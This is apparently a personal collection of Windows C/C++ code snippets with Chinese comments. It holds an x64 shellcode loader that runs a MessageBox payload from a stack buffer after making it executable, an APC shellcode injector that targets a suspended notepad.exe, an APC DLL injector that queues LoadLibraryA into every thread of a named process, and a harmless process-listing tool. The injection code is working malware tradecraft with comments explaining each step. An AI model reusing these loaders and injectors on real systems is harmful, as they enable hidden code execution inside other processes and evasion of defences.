//X64、shellcode、MessageBox
#include <iostream>
#include <Windows.h>
int main()
{
char shellcode[] =
"\x48\x83\xEC\x28\x48\x83\xE4\xF0\x48\x8D\x15\x66\x00\x00\x00"
"\x48\x8D\x0D\x52\x00\x00\x00\xE8\x9E\x00\x00\x00\x4C\x8B\xF8"
"\x48\x8D\x0D\x5D\x00\x00\x00\xFF\xD0\x48\x8D\x15\x5F\x00\x00"
"\x00\x48\x8D\x0D\x4D\x00\x00\x00\xE8\x7F\x00\x00\x00\x4D\x33"
"\xC9\x4C\x8D\x05\x61\x00\x00\x00\x48\x8D\x15\x4E\x00\x00\x00"
"\x48\x33\xC9\xFF\xD0\x48\x8D\x15\x56\x00\x00\x00\x48\x8D\x0D"
"\x0A\x00\x00\x00\xE8\x56\x00\x00\x00\x48\x33\xC9\xFF\xD0\x4B"
"\x45\x52\x4E\x45\x4C\x33\x32\x2E\x44\x4C\x4C\x00\x4C\x6F\x61"
"\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x00\x55\x53\x45\x52\x33"
"\x32\x2E\x44\x4C\x4C\x00\x4D\x65\x73\x73\x61\x67\x65\x42\x6F"
"\x78\x41\x00\x48\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64\x00"
"\x4D\x65\x73\x73\x61\x67\x65\x00\x45\x78\x69\x74\x50\x72\x6F"
"\x63\x65\x73\x73\x00\x48\x83\xEC\x28\x65\x4C\x8B\x04\x25\x60"
"\x00\x00\x00\x4D\x8B\x40\x18\x4D\x8D\x60\x10\x4D\x8B\x04\x24"
"\xFC\x49\x8B\x78\x60\x48\x8B\xF1\xAC\x84\xC0\x74\x26\x8A\x27"
"\x80\xFC\x61\x7C\x03\x80\xEC\x20\x3A\xE0\x75\x08\x48\xFF\xC7"
"\x48\xFF\xC7\xEB\xE5\x4D\x8B\x00\x4D\x3B\xC4\x75\xD6\x48\x33"
"\xC0\xE9\xA7\x00\x00\x00\x49\x8B\x58\x30\x44\x8B\x4B\x3C\x4C"
"\x03\xCB\x49\x81\xC1\x88\x00\x00\x00\x45\x8B\x29\x4D\x85\xED"
"\x75\x08\x48\x33\xC0\xE9\x85\x00\x00\x00\x4E\x8D\x04\x2B\x45"
"\x8B\x71\x04\x4D\x03\xF5\x41\x8B\x48\x18\x45\x8B\x50\x20\x4C"
"\x03\xD3\xFF\xC9\x4D\x8D\x0C\x8A\x41\x8B\x39\x48\x03\xFB\x48"
"\x8B\xF2\xA6\x75\x08\x8A\x06\x84\xC0\x74\x09\xEB\xF5\xE2\xE6"
"\x48\x33\xC0\xEB\x4E\x45\x8B\x48\x24\x4C\x03\xCB\x66\x41\x8B"
"\x0C\x49\x45\x8B\x48\x1C\x4C\x03\xCB\x41\x8B\x04\x89\x49\x3B"
"\xC5\x7C\x2F\x49\x3B\xC6\x73\x2A\x48\x8D\x34\x18\x48\x8D\x7C"
"\x24\x30\x4C\x8B\xE7\xA4\x80\x3E\x2E\x75\xFA\xA4\xC7\x07\x44"
"\x4C\x4C\x00\x49\x8B\xCC\x41\xFF\xD7\x49\x8B\xCC\x48\x8B\xD6"
"\xE9\x14\xFF\xFF\xFF\x48\x03\xC3\x48\x83\xC4\x28\xC3";
printf("shellcode size: %d\n", sizeof(shellcode));
DWORD flOldProtect;
VirtualProtect(shellcode, sizeof(shellcode), PAGE_EXECUTE_READWRITE, &flOldProtect);
(*(void (*)()) & shellcode)();
return 0;
}
//APC注入shellcode
****************************************************************************
#include <windows.h>
#include <stdio.h>
unsigned char shellcode[] = "";
unsigned int buff = sizeof(shellcode);
int main(void) {
STARTUPINFO si; // 定义一个STARTUPINFO结构体,用于指定新进程的启动信息
PROCESS_INFORMATION pi; // 定义一个PROCESS_INFORMATION结构体,用于接收新进程的相关信息
void* ptApcRoutine; // 定义一个指针,用于指向要在新进程中执行的APC(Asynchronous Procedure Call)例程
// 将STARTUPINFO结构体的内容清零,确保所有成员初始化为0
ZeroMemory(&si, sizeof(si));
// 设置STARTUPINFO结构体的大小,这是使用该结构体的必要步骤
si.cb = sizeof(si);
// 将PROCESS_INFORMATION结构体的内容清零,确保所有成员初始化为0
ZeroMemory(&pi, sizeof(pi));
CreateProcessA(0, (char*)"notepad.exe", 0, 0, 0, CREATE_SUSPENDED, 0, 0, &si, &pi);
// 在新创建的进程(pi.hProcess)的地址空间中分配内存。
// 第一个参数hProcess为新进程的句柄。
// 第二个参数lpAddress为NULL,表示让系统自动选择分配内存的起始地址。
// 第三个参数dwSize为buff,即要分配的内存大小,这里是shellcode的大小。
// 第四个参数flAllocationType为MEM_COMMIT,表示分配物理内存。
// 第五个参数flProtect为PAGE_EXECUTE_READ,表示分配的内存具有可执行和可读权限。
// 函数返回分配内存的起始地址,存储在ptApcRoutine中。
ptApcRoutine = VirtualAllocEx(pi.hProcess, NULL, buff, MEM_COMMIT, PAGE_EXECUTE_READ);
// 将shellcode写入到新进程(pi.hProcess)分配的内存(ptApcRoutine)中。
// 第一个参数hProcess为新进程的句柄。
// 第二个参数lpBaseAddress为ptApcRoutine,即要写入的目标内存地址。
// 第三个参数lpBuffer为(PVOID)shellcode,指向要写入的shellcode数据。
// 第四个参数nSize为(SIZE_T)buff,即要写入的数据大小。
// 第五个参数lpNumberOfBytesWritten为NULL,表示不关心实际写入的字节数。
WriteProcessMemory(pi.hProcess, ptApcRoutine, (PVOID)shellcode, (SIZE_T)buff, (SIZE_T*)NULL);
// 将一个APC例程(ptApcRoutine)排队到新进程(pi.hThread)的主线程中。
// 第一个参数pFunction为(PAPCFUNC)ptApcRoutine,指向要执行的APC例程。
// 第二个参数hThread为pi.hThread,即要排队APC例程的线程句柄。
// 第三个参数dwData为NULL,表示不传递额外的数据给APC例程。
QueueUserAPC((PAPCFUNC)ptApcRoutine, pi.hThread, NULL);
// 恢复新进程(pi.hThread)主线程的执行,使其开始运行。
ResumeThread(pi.hThread);
return 0;
}
****************************************************************************
//APC注入dll
//https://www.cnblogs.com/nice0e3/p/15318330.html
#include <Windows.h>
#include <iostream>
#include <TlHelp32.h>
// 根据进程名称获取PID
DWORD GetProcessIdByProcessName(char* pszProcessName);
// 根据PID获取所有的相应线程ID
BOOL GetAllThreadIdByProcessId(DWORD dwProcessId, DWORD** ppThreadId, DWORD* dwThreadIdLength);
// APC注入
BOOL ApcInjectDll(char* pszProcessName, char* pszDllName);
void ShowError(char* pszText)
{
char szErr[MAX_PATH] = { 0 };
::wsprintf(szErr, "%s Error[%d]\n", pszText);
::MessageBox(NULL, szErr, "ERROR", MB_OK | MB_ICONERROR);
}
// 根据进程名称获取PID
DWORD GetProcessIdByProcessName(char* pszProcessName)
{
DWORD dwProcessId = 0;
PROCESSENTRY32 pe32 = { 0 };
HANDLE hSnapshot = NULL;
BOOL bRet = FALSE;
::RtlZeroMemory(&pe32, sizeof(pe32));
pe32.dwSize = sizeof(pe32);
// 获取进程快照
hSnapshot = ::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (NULL == hSnapshot)
{
ShowError((char *)"CreateToolhelp32Snapshot");
return dwProcessId;
}
// 获取第一条进程快照信息
bRet = ::Process32First(hSnapshot, &pe32);
while (bRet)
{
// 获取快照信息
if (0 == ::lstrcmpi(pe32.szExeFile, pszProcessName))
{
dwProcessId = pe32.th32ProcessID;
break;
}
// 遍历下一个进程快照信息
bRet = ::Process32Next(hSnapshot, &pe32);
}
return dwProcessId;
}
// 根据PID获取所有的相应线程ID
BOOL GetAllThreadIdByProcessId(DWORD dwProcessId, DWORD** ppThreadId, DWORD* pdwThreadIdLength)
{
DWORD* pThreadId = NULL;
DWORD dwThreadIdLength = 0;
DWORD dwBufferLength = 1000;
THREADENTRY32 te32 = { 0 };
HANDLE hSnapshot = NULL;
BOOL bRet = TRUE;
do
{
// 申请内存
pThreadId = new DWORD[dwBufferLength];
if (NULL == pThreadId)
{
ShowError((char*)"new");
bRet = FALSE;
break;
}
::RtlZeroMemory(pThreadId, (dwBufferLength * sizeof(DWORD)));
// 获取线程快照
::RtlZeroMemory(&te32, sizeof(te32));
te32.dwSize = sizeof(te32);
hSnapshot = ::CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
if (NULL == hSnapshot)
{
ShowError((char*)"CreateToolhelp32Snapshot");
bRet = FALSE;
break;
}
// 获取第一条线程快照信息
bRet = ::Thread32First(hSnapshot, &te32);
while (bRet)
{
// 获取进程对应的线程ID
if (te32.th32OwnerProcessID == dwProcessId)
{
pThreadId[dwThreadIdLength] = te32.th32ThreadID;
dwThreadIdLength++;
}
// 遍历下一个线程快照信息
bRet = ::Thread32Next(hSnapshot, &te32);
}
// 返回
*ppThreadId = pThreadId;
*pdwThreadIdLength = dwThreadIdLength;
bRet = TRUE;
} while (FALSE);
if (FALSE == bRet)
{
if (pThreadId)
{
delete[]pThreadId;
pThreadId = NULL;
}
}
return bRet;
}
// APC注入
BOOL ApcInjectDll(char* pszProcessName, char* pszDllName)
{
BOOL bRet = FALSE;
DWORD dwProcessId = 0;
DWORD* pThreadId = NULL;
DWORD dwThreadIdLength = 0;
HANDLE hProcess = NULL, hThread = NULL;
PVOID pBaseAddress = NULL;
PVOID pLoadLibraryAFunc = NULL;
SIZE_T dwRet = 0, dwDllPathLen = 1 + ::lstrlen(pszDllName);
DWORD i = 0;
do
{
// 根据进程名称获取PID
dwProcessId = GetProcessIdByProcessName(pszProcessName);
if (0 >= dwProcessId)
{
bRet = FALSE;
break;
}
// 根据PID获取所有的相应线程ID
bRet = GetAllThreadIdByProcessId(dwProcessId, &pThreadId, &dwThreadIdLength);
if (FALSE == bRet)
{
bRet = FALSE;
break;
}
// 打开注入进程
hProcess = ::OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);
if (NULL == hProcess)
{
ShowError((char*)"OpenProcess");
bRet = FALSE;
break;
}
// 在注入进程空间申请内存
pBaseAddress = ::VirtualAllocEx(hProcess, NULL, dwDllPathLen, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (NULL == pBaseAddress)
{
ShowError((char*)"VirtualAllocEx");
bRet = FALSE;
break;
}
// 向申请的空间中写入DLL路径数据
::WriteProcessMemory(hProcess, pBaseAddress, pszDllName, dwDllPathLen, &dwRet);
if (dwRet != dwDllPathLen)
{
ShowError((char*)"WriteProcessMemory");
bRet = FALSE;
break;
}
// 获取 LoadLibrary 地址
pLoadLibraryAFunc = ::GetProcAddress(::GetModuleHandle("kernel32.dll"), "LoadLibraryA");
if (NULL == pLoadLibraryAFunc)
{
ShowError((char*)"GetProcessAddress");
bRet = FALSE;
break;
}
// 遍历线程, 插入APC
for (i = 0; i < dwThreadIdLength; i++)
{
// 打开线程
hThread = ::OpenThread(THREAD_ALL_ACCESS, FALSE, pThreadId[i]);
if (hThread)
{
// 插入APC
::QueueUserAPC((PAPCFUNC)pLoadLibraryAFunc, hThread, (ULONG_PTR)pBaseAddress);
// 关闭线程句柄
::CloseHandle(hThread);
hThread = NULL;
}
}
bRet = TRUE;
} while (FALSE);
// 释放内存
if (hProcess)
{
::CloseHandle(hProcess);
hProcess = NULL;
}
if (pThreadId)
{
delete[]pThreadId;
pThreadId = NULL;
}
return bRet;
}
int main() {
BOOL bRet = FALSE;
// APC注入
#ifdef _WIN64
bRet = ApcInjectDll((char*)"", (char*)"");
#else
bRet = ApcInjectDll("", "");
#endif
if (bRet)
{
printf("APC Inject OK.\n");
}
else
{
printf("APC Inject ERROR.\n");
}
system("pause");
return 0;
}
//获取进程信息
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <psapi.h>
// 获取进程路径
void GetProcessPath(DWORD processId, wchar_t* path, size_t size) {
HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, processId);
if (hProcess != NULL) {
if (GetModuleFileNameExW(hProcess, NULL, path, (DWORD)size)) {
// 路径获取成功
}
else {
path[0] = L'\0';
}
CloseHandle(hProcess);
}
else {
path[0] = L'\0';
}
}
// 打印进程信息
void PrintProcessInfo() {
HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProcessSnap == INVALID_HANDLE_VALUE) {
wprintf(L"CreateToolhelp32Snapshot (process) failed: %d\n", GetLastError());
return;
}
PROCESSENTRY32W pe32;
pe32.dwSize = sizeof(PROCESSENTRY32W);
if (!Process32FirstW(hProcessSnap, &pe32)) {
wprintf(L"Process32First failed: %d\n", GetLastError());
CloseHandle(hProcessSnap);
return;
}
wprintf(L"Process Information:\n");
wprintf(L"% - 10s % - 40ls % - 50ls\n", L"PID", L"Process Name", L"Process Path");
do {
wchar_t path[MAX_PATH];
GetProcessPath(pe32.th32ProcessID, path, MAX_PATH);
wprintf(L"% - 10d % - 40ls % - 50ls\n", pe32.th32ProcessID, pe32.szExeFile, path);
} while (Process32NextW(hProcessSnap, &pe32));
CloseHandle(hProcessSnap);
}
int main() {
SetConsoleOutputCP(CP_UTF8); // 设置控制台输出为UTF - 8编码
PrintProcessInfo();
return 0;
}